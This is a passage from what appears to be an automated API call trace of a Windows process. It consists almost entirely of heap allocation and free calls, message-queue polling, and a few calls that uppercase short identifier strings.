lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0208.835] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71868 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be6) returned 0x2a9a940 [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0208.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be6) returned 0x2ab6468 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0208.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0208.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0208.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.838] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0208.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0208.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0208.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0208.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.842] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.842] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.842] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.843] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.844] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0208.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.845] 